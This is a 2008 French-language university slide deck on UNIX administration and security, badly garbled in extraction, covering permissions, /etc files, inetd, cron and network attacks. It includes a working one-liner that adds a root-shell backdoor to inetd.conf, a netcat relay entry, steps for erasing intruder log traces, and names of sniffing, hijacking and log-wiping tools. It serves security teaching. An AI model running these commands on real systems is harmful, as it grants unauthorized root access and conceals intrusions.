UNIX Administration Securite 12 2008 for Students

8/8/2019 UNIX Administration Securite 12 2008 for Students

1/30

(c) A.JEMAI- Scurit Unix-2008 1

UNIXUNIX

Administration etAdministration et

SScuritcuritAbderrazakAbderrazakJEMAIJEMAI

Email :Email :[email protected]@insat.rnu.tn


2/30

2(c) A.JEMAI- Scurit Unix-2008

PlanPlan

PrPrsentation Gsentation Gnnrale drale dUnixUnix

MMcanisme de dcanisme de dmarrage du systmarrage du systmeme Permissions sous UnixPermissions sous Unix

Services rServices rseaux sousseaux sous unixunix Attaques sousAttaques sous unixunix


3/30


CaractCaractristique du Systristique du Systme Unixme Unix

InteractifInteractif

MultitchesMultitches MultiMulti--utilisateursutilisateurs


4/30


Historique dHistorique dUNIXUNIXAT&T

1969 cration dUNIX

1976 version 6

AT&T Berkeley

System III

System V R4

4.1 bsd

4.2 bsd (SunOs)1983

AIXSolaris, HP-UX Linux


5/30


Composantes principales dComposantes principales dUNIXUNIX

SystSystme de fichiersme de fichiers

NoyauNoyau ShellShell


6/30


Le systLe systme de fichiersme de fichiers

varusrtmphomedev bin etc

grouppasswd man spool

lp mail

mnt

bin log


7/30


Noyau et processusNoyau et processus

Matriel : disques,

mmoire, cartesinterfaces, etc.)

Noyau

Processus 1

Processus 2

Processus N

kshsh

csh


8/30


LeLe shellshell UnUn shellshell ::

CCest un programme (/est un programme (/usrusr//binbin//kshksh, /, /usrusr//binbin//cshcsh,,//usrusr//binbin/sh)./sh). Lors de son exLors de son excution il devient un processus (visualiser aveccution il devient un processus (visualiser avec

la commandela commandepsps).). CCest aussi un langage de commandes.est aussi un langage de commandes.

Les variantes :Les variantes : KshKsh : Korn: Korn shellshell

CshCsh : C: C--shellshell Sh :Sh : BourneBourne ShellShell BashBash :: kshksh enrichi (utilisenrichi (utilis dans Linux)dans Linux)


9/30


Niveau dNiveau dexexcutioncution Description :Description :

0 : arrt de la machine0 : arrt de la machine1 : mono utilisateur1 : mono utilisateur2 : Multi2 : Multi--UtilisateursUtilisateurs3 : Multi3 : Multi--Utilisateurs avec NFSUtilisateurs avec NFS

5 : X115 : X116 : reboot6 : reboot

LancementLancement## InitInit levellevel

Exemple :Exemple :## initinit 00 pour arrter la machinepour arrter la machine## initinit 66 pour redpour redmarrermarrer


10/30


Services rServices rseauxseaux //etcetc/services : description des port et services/services : description des port et services

associassociss //etcetc/inetd.conf : consult/inetd.conf : consult parpar inetdinetd pourpour

savoir quel ports surveiller et quel processussavoir quel ports surveiller et quel processus

lancer.lancer. A chaque demande deA chaque demande de telnettelnet, un d, un dmonmontelnetdtelnetd est crest cr pour spour soccuper du client.occuper du client.

A chaque demande de ftp, un dA chaque demande de ftp, un dmonmon ftpdftpd estestcrcr..


11/30


//etcetc/inetd.conf/inetd.conf

Nom du service : (exNom du service : (ex telnettelnet)) Type de socket : type deType de socket : type de connectionconnection ((streamstream,, dgramdgram,, rawraw, etc.)., etc.). Protocole :Protocole : tcptcp ouou udpudp Etat :Etat : nowaitnowait, cr, crer un processus pour chaque requte.er un processus pour chaque requte. PropriPropritaire : le service aura les permissions du propritaire : le service aura les permissions du propritaire.taire.

Programme : nom du programmeProgramme : nom du programme lancerlancer Arguments : Les arguments associArguments : Les arguments associs au lancement du programme.s au lancement du programme.

telnet stream tcp nowait root /usr/sbin/in.telnetdin.telnetd

# ftp stream tcp nowait root /usr/sbin/in.ftpd in.ftpd


12/30


Attaques sur /Attaques sur /etcetc//inetd.confinetd.conf

Traffic RelayingTraffic Relaying

Configuration :Configuration :1111111111 streamstream tcptcp nowaitnowait nobodynobody//usrusr//sbinsbin//tcpdtcpd //usrusr//binbin//ncnc [[next_hopnext_hop] 54321] 54321

couter sur le port 11111 et rediriger vers le port 54321couter sur le port 11111 et rediriger vers le port 54321

Output-to-input

Relay A

Output-to-inputRelay B

Client netcat

Hacker

Ecouteur netcatvictime


13/30


InitInit etet inetdinetd

Ecoutenten

permanence

init

httpd

sendmail

inetd ftpd

telnetd

tftpd

Lancement lademande par

inetd


14/30


Attaques surAttaques sur inetdinetd ::

BackdoorBackdoor

//binbin/sh/sh cc "" echoecho 1234512345 streamstreamtcptcp nowaitnowaitrootroot //binbin/sh/sh shsh ii "" >> />> /etcetc//inetd.confinetd.conf;;

killallkillall HUPHUP inetdinetd

Rajouter unRajouter un couteur sur le port 12345 qui excouteur sur le port 12345 qui excutecutetoute commande retoute commande reue sur le port due sur le port dentrentre.e.

DemanderDemander inetdinetd de relire son fichier de configuration.de relire son fichier de configuration.


15/30


CronCron UtilisUtilis pour lancerpour lancer une heure prune heure prcise un programmecise un programme

ou un script.ou un script. ExemplesExemples

Effectuer un scan des virus chaque soir entre minuit et 3h duEffectuer un scan des virus chaque soir entre minuit et 3h dumatin.matin.

Autoriser lAutoriser laccaccs aux jeux uniquement entre 12h et 14h.s aux jeux uniquement entre 12h et 14h.

Les travaux sont dans /Les travaux sont dans /usrusr/lib//lib/crontabcrontab et /et /etcetc//crontabcrontab Les agresseurs peuvent programmer des attaques.Les agresseurs peuvent programmer des attaques.


16/30


Lancement manuel des processusLancement manuel des processus Chemin de recherche des programmes : PATHChemin de recherche des programmes : PATH

Commande dCommande daffichage:affichage:$$ echoecho $ PATH$ PATH Exemple :Exemple :

//usrusr/local//local/binbin:/:/binbin:/:/usrusr//binbin:/:/usrusr/X11R6//X11R6/binbin

Autres commandes :Autres commandes :whereiswhereis,,whichwhich Le rLe rpertoire courantpertoire courant .. PrPrcaution : ne jamais mettre lecaution : ne jamais mettre le .. en den dbut dubut du pathpath..

ExempleExemple viterviter.:/.:/usrusr/local//local/binbin:/:/binbin:/:/usrusr//binbin:/:/usrusr/X11R6//X11R6/binbin


17/30


Interaction avec les processusInteraction avec les processus A chaque processus correspond unA chaque processus correspond un pidpid..

Exemple : (1Exemple : (1 initinit, 526, 526 inetdinetd)) Afficher lAfficher ltat des processus :tat des processus :psps

Afficher tous les processus :Afficher tous les processus :psps auxaux killkill etet killallkillall : envoyer un signal: envoyer un signal un processusun processus

Exemple :Exemple : ## killkill --HUP 512HUP 512

## killallkillall --HUPHUP inetdinetd


18/30


Comptes et groupesComptes et groupes Chaque utilisateur dChaque utilisateur dtient un comptetient un compte //etcetc//passwdpasswd Un utilisateur appartientUn utilisateur appartient un groupeun groupe //etcetc/group/group Les mots de passe sont stockLes mots de passe sont stocks danss dans //etcetc//shadowshadow Changer le mot de passeChanger le mot de passe

$$passwdpasswd

OldOld passwdpasswd ::

NewNew passwdpasswd

RetypeRetype newnew passwdpasswd

##passwdpasswdbobbob

NewNew passwdpasswd

RetypeRetype newnew passwdpasswd

CrCration dation dun utilisateur :un utilisateur : useradduseradd,, admintooladmintool,, userconfuserconf CrCration dation dun groupe :un groupe : groupaddgroupadd,, admintooladmintool,, userconfuserconf


19/30


//etcetc//passwdpasswd root:xroot:x:0:0::0:0:rootroot:/:/rootroot:/:/binbin//bashbash

bin:xbin:x:1:1::1:1:binbin:/:/binbin::daemon:x:2:2:daemon:/daemon:x:2:2:daemon:/sbinsbin::adm:xadm:x:3:4::3:4:admadm:/var/:/var/admadm::lp:xlp:x:4:7::4:7:lplp:/var/spool/:/var/spool/lpdlpd::sync:xsync:x:5:0::5:0:syncsync:/:/sbinsbin:/:/binbin//syncsynchalt:xhalt:x:7:0::7:0:halthalt:/:/sbinsbin:/:/sbinsbin//halthaltmail:x:8:12:mail:/var/spool/mail:mail:x:8:12:mail:/var/spool/mail:news:x:9:13:news:/var/spool/news:news:x:9:13:news:/var/spool/news:uucp:xuucp:x:10:14::10:14:uucpuucp:/var/spool/:/var/spool/uucpuucp::ftp:x:14:50:FTP User:/var/ftp:ftp:x:14:50:FTP User:/var/ftp:squid:xsquid:x:23:23::/var/spool/:23:23::/var/spool/squidsquid:/:/devdev//nullnulldhcpd:xdhcpd:x:19:19::19:19:DhcpdDhcpd User:/var/User:/var/dhcpddhcpd::named:xnamed:x:25:25::25:25:BindBind User:/var/User:/var/namednamed::rpm:xrpm:x:37:37:RPM User:/var/lib/:37:37:RPM User:/var/lib/rpmrpm:/:/binbin/false/falseapache:x:48:48:Apache User:/var/www:apache:x:48:48:Apache User:/var/www:rpc:xrpc:x:32:32::32:32:PortmapperPortmapper RPC user:/:/RPC user:/:/binbin/false/falsenobody:xnobody:x:99:99::99:99:NobodyNobody:/::/:jemai:x:501:500:jemai:x:501:500:AbderrazakAbderrazakJEMAI:/home/jemai:/JEMAI:/home/jemai:/binbin//bashbash


20/30


//etcetc/group/group root:xroot:x:0::0:rootroot

bin:xbin:x:1::1:root,bin,daemonroot,bin,daemondaemon:xdaemon:x:2::2:root,bin,daemon,ldaproot,bin,daemon,ldapsys:xsys:x:3::3:root,bin,admroot,bin,admadm:xadm:x:4::4:root,adm,daemonroot,adm,daemontty:xtty:x:5::5:lp:xlp:x:7::7:daemon,lpdaemon,lpmail:x:12:mailmail:x:12:mailnews:x:13:newsnews:x:13:news

uucp:xuucp:x:14::14:uucpuucpdhcpd:xdhcpd:x:19::19:squid:xsquid:x:23::23:named:xnamed:x:25::25:rpc:xrpc:x:32::32:apache:x:48:apache:x:48:

ftp:x:50:ftp:x:50:nobody:xnobody:x:99::99:secunix:xsecunix:x:501::501:


21/30


Permission sous UNIXPermission sous UNIX Trois possibilitTrois possibilits ds daccaccs appels appeles permissions ou priviles permissions ou privilges:ges:

rreadead lecturelecture Affichage du contenu dAffichage du contenu dun run rpertoire (pertoire (lsls)) Affichage du contenu dAffichage du contenu dun fichier (more, cat,un fichier (more, cat, headhead,, tailtail))

wwriterite criturecriture Copie dCopie dun fichier dans un run fichier dans un rpertoire (pertoire (cpcp)) Changement du contenu dChangement du contenu dun fichier (vi)un fichier (vi) CrCration ou suppression dation ou suppression dun fichier dans un run fichier dans un rpertoire (pertoire (touchtouch, vi,, vi, rmrm))

xx exexcutercuter AccAccderder un run rpertoire (cd etpertoire (cd et findfind)) ExExcution dcution dun programmeun programme


22/30


Affichage des caractAffichage des caractristiquesristiques

lsls --ll

r - xxwr- r - x

type propritaire groupe autres

group otheruser

mode


23/30


lslsll$$ lsls --ll

--rwrw--rr----rr---- 1 jemai1 jemai adminadmin 255255 ffvv 12 15:3812 15:38 myprog.cmyprog.c--rwrw--rr----rr---- 1 jemai1 jemai adminadmin 00 sep 20 2001sep 20 2001 touchfiletouchfile--rwxrrwxr----rr---- 1 jemai1 jemai adminadmin 489489 ffvv 13 15:3813 15:38 myprogmyprogdrwxdrwx--rr--xrxr--xx 1 jemai1 jemai adminadmin 865865 marmar 5 18:585 18:58 myrepmyrep--rwrw-------------- 1 jemai1 jemai adminadmin 6060 avravr 18 20:51 perso18 20:51 persolrwxrwxrwxlrwxrwxrwx 1 jemai1 jemai adminadmin 1111 ff v 13 15:23 v 13 15:23linkfilelinkfile --> ./> ./binbin//mytestmytestdrwxdrwx--rr--xrxr--xx 1 jemai1 jemai adminadmin 865865 marmar 5 18:585 18:58 myrepmyrep

$$ lsls ldld //usrusr

drwxrdrwxr--xrxr--xx 3838 rootroot syssys 10241024 ffvv 12 15:00 /12 15:00 /usrusr

$$ lsls l /datal /data

drwxrdrwxr--xrxr--xx 33 rootroot syssys 512512 ffvv 12 15:00 archive12 15:00 archive--rwrw--rr----rr---- 33 rootroot rootroot 78607860 ffvv 12 15:1012 15:10 logfilelogfile

Nom du fichierGroupeProp.Permissions Taille Date


24/30


lslsl /l /etcetc --rwrw--rr----rr---- 11 rootroot rootroot 255255 ffvv 12 15:3812 15:38 crontabcrontab

--rwrw--rr----rr---- 11 rootroot rootroot 00 sep 20 2001 exportssep 20 2001 exports--rwrw--rr----rr---- 11 rootroot rootroot 489489 ffvv 13 15:3813 15:38 fstabfstab--rwrw--rr----rr---- 11 rootroot rootroot 865865 marmar 5 18:58 group5 18:58 group

--rwrw--rr----rr---- 11 rootroot rootroot 6060 avravr 18 20:51 hosts18 20:51 hostslrwxrwxrwxlrwxrwxrwx 11 rootroot rootroot 1111 ff v 13 15:23 v 13 15:23init.dinit.d --> rc.d/init.d/> rc.d/init.d/--rwrw--rr----rr---- 11 rootroot rootroot 17581758 marmar 5 18:595 18:59 inittabinittab--rwrw--rr----rr---- 11 rootroot rootroot 955955 sep 21 2001 krb5.confsep 21 2001 krb5.conf--rwrw--rr----rr---- 11 rootroot rootroot 19221922 marmar 5 18:585 18:58 passwdpasswdlrwxrwxrwxlrwxrwxrwx 11 rootroot rootroot 77 ff v 13 15:23 v 13 15:23rcrc --> rc.d/> rc.d/rcrc**

lrwxrwxrwxlrwxrwxrwx 11 rootroot rootroot 1010 ff v 13 15:23 rc0.d v 13 15:23 rc0.d--> rc.d/rc0.d/> rc.d/rc0.d/lrwxrwxrwxlrwxrwxrwx 11 rootroot rootroot 1010 ff v 13 15:23 rc1.d v 13 15:23 rc1.d--> rc.d/rc1.d/> rc.d/rc1.d/lrwxrwxrwxlrwxrwxrwx 11 rootroot rootroot 1010 ff v 13 15:23 rc2.d v 13 15:23 rc2.d--> rc.d/rc2.d/> rc.d/rc2.d/lrwxrwxrwxlrwxrwxrwx 11 rootroot rootroot 1010 ff v 13 15:23 rc3.d v 13 15:23 rc3.d--> rc.d/rc3.d/> rc.d/rc3.d/lrwxrwxrwxlrwxrwxrwx 11 rootroot rootroot 1010 ff v 13 15:23 rc5.d v 13 15:23 rc5.d--> rc.d/rc5.d/> rc.d/rc5.d/lrwxrwxrwxlrwxrwxrwx 11 rootroot rootroot 1010 ff v 13 15:23 rc6.d v 13 15:23 rc6.d--> rc.d/rc6.d/> rc.d/rc6.d/

drwxrdrwxr--xrxr--xx 1010 rootroot rootroot 40964096 ffvv 13 15:3813 15:38 rc.drc.d//--rwrw--rr----rr---- 11 rootroot rootroot 8383 mai 20 18:57mai 20 18:57 resolv.confresolv.conf--rwrw--rr----rr---- 11 rootroot rootroot 417942 sep 20 2001 services417942 sep 20 2001 services--rr---------------- 11 rootroot rootroot 13731373 marmar 5 18:585 18:58 shadowshadow--rwrw--rr----rr---- 11 rootroot rootroot 295295 sep 14 2001sep 14 2001 inetd.confinetd.conf


25/30


Unix TrustUnix Trust Les machinesLes machines unixunix se donnent mutuellement desse donnent mutuellement des

confiances via :confiances via ://etcetc/hosts.equiv/hosts.equiv

..rhostsrhosts

Avantages : exAvantages : excution des rcution des r--commandes (commandes (rcprcp,, rshrshrloginrlogin, etc.)., etc.).

InconvInconvnients : si un intrus rnients : si un intrus russit lussit laccaccss la premila premirere

machine, il peut attaquer toute la chamachine, il peut attaquer toute la chane.ne.


26/30


Attaques des fichiers logAttaques des fichiers log Cible des attaques :Cible des attaques :

Fichiers log : mode ASCII, ayant privilFichiers log : mode ASCII, ayant privilgege rootroot.. FichiersFichiers utmputmp,,wtmpwtmp etet lastloglastlogayant le privilayant le privilgege rootroot..

Modifier les fichiers log :Modifier les fichiers log :

1.1. Lire le fichier /Lire le fichier /etcetc//syslog.confsyslog.conf2.2. Utiliser la technique dUtiliser la technique dbordement de pilebordement de pile bufferbuffer overflowoverflow

pour se procurer du privilpour se procurer du privilge dege de rootroot

3.3. Supprimer les entrSupprimer les entres correspondanteses correspondantes llidentitidentit dedellintrus.intrus.


27/30


AltAltration des fichiersration des fichiers

utmputmp,,wtmpwtmp etet lastloglastlog

Format : binaireFormat : binaire

PrivilPrivilge :ge : rootroot Outils de modification :Outils de modification :

ftp.technotronic.com/unix/logftp.technotronic.com/unix/log--tools/tools/ Exemples :Exemples :

removeremove : modification du derni: modification du dernire date de connexion,re date de connexion,

adresse etadresse et tat des utilisateurs danstat des utilisateurs dans lastloglastlog.. WtmpedWtmped,, marrymarry,, cloakcloak,, logweditlogwedit,, wzapwzap etet zapperzapper..


28/30


Services RServices Rseaux sous Unixseaux sous Unix

AppelAppel aussi X11. Offre une interface graphique GUIaussi X11. Offre une interface graphique GUI distance.distance.XXWindowWindowNetwork File System. Partages de ressources entre machinesNetwork File System. Partages de ressources entre machinesNFSNFS

Domain Name Server. RDomain Name Server. Rsolution des noms de domaines en adresse IPsolution des noms de domaines en adresse IPDSNDSN

ExExcution des commandescution des commandes distance (distance (rcprcp,, rloginrlogin,, rshrsh).).RR--cmdscmds

SendmailSendmailMAILMAIL

serveur web, initialisserveur web, initialis parpar initinitHTTPDHTTPD

Trivial File Transfert Protocol. Transfert sans authentificationTrivial File Transfert Protocol. Transfert sans authentificationTFTPTFTP

File Transfert Protocol (File Transfert Protocol (inetdinetd,, ftpdftpd). Transmission du texte en clair). Transmission du texte en clairFTPFTP

session de loginsession de login distance (distance (inetdinetd,, telnetdtelnetd).Transmission en clair).Transmission en clairTelnetTelnet


29/30


Collecte des informationsCollecte des informations

sniffingsniffing Collecte des donnCollecte des donnes au niveau Mach (L2) dans un res au niveau Mach (L2) dans un rseau local.seau local. Nom du programme :Nom du programme : sniffersniffer

Type de donnType de donnes collectes collectes :es : nom de login etnom de login et passwdpasswd suitesuite unun telnettelnet.. Requtes et rRequtes et rponsesponses dnsdns Messages emailMessages email PasswdPasswd suitesuite un ftpun ftp Fichiers partagFichiers partags pars par nfsnfs

Comment ?Comment ? Avoir un compte, ou accAvoir un compte, ou accder illder illgalement (buffergalement (buffer overflowoverflow)) Carte rCarte rseau en modeseau en mode permiscuouspermiscuous modemode

Outils :Outils : TcpdumpTcpdump, freeware pour UNIX, freeware pour UNIX www.tcpdump.orgwww.tcpdump.org WindumpWindump, freeware pour Windows, freeware pour Windowswww.netgroupwww.netgroup--serv.polito.it.orgserv.polito.it.org SnortSnort sniffer et dsniffer et dtecteur dtecteur dintrusion rintrusion rseauseauwww.snort.orgwww.snort.org EtherealEthereal, pour UNIX et NT, pour UNIX et NTwww.ethereal.comwww.ethereal.com SniffitSniffit, freeware pour Unix, freeware pour Unixwww.reptile.rug.ac.be/~coder/sniffit/sniffit.htmlwww.reptile.rug.ac.be/~coder/sniffit/sniffit.html DsniffDsniff, pour Unix,, pour Unix,www.monkey.org/~dugsong/dsniff/www.monkey.org/~dugsong/dsniff/


30/30


HijackingHijacking SniffingSniffing: l: lagresseur collecte les informationsagresseur collecte les informations IPIP spoofingspoofing: l: lagresseur se dagresseur se dguise commeguise comme tant une autre machine (adresse IP).tant une autre machine (adresse IP).

HijackingHijacking: combinaison des deux techniques. Il s: combinaison des deux techniques. Il sagit de voler la session de la victime.agit de voler la session de la victime.La victime pense souvent que la session est perdu suiteLa victime pense souvent que la session est perdu suite un problun problme rme rseau.seau. Comment ?Comment ?

LLagresseur attend que la victime se connecte (authentification)agresseur attend que la victime se connecte (authentification) LLagresseur collecte les informations de la conversation (IP, TCPagresseur collecte les informations de la conversation (IP, TCP sequencesequence numbernumber,, etcetc).). LLagresseur envois des commandes en se dagresseur envois des commandes en se dguisant pour la victime.guisant pour la victime.

Outils :Outils : HuntHunt www.cri.cz/kra/index.htmlwww.cri.cz/kra/index.html DsniffDsniff JuggernautJuggernautwww.packetstorm.security.comwww.packetstorm.security.com IPIPWatcherWatcher www.engarde.comwww.engarde.com

TTYWatcherTTYWatcher, freeware, freeware atat ftp.cerias.purdue.edu/pub/tools/unix/sysutils/ftp.cerias.purdue.edu/pub/tools/unix/sysutils/ TTYSnoopTTYSnoop freewarefreeware atatwww.packetstorm.security.comwww.packetstorm.security.com

UNIX Administration Securite 12 2008 for Students

Documents

Transcript of UNIX Administration Securite 12 2008 for Students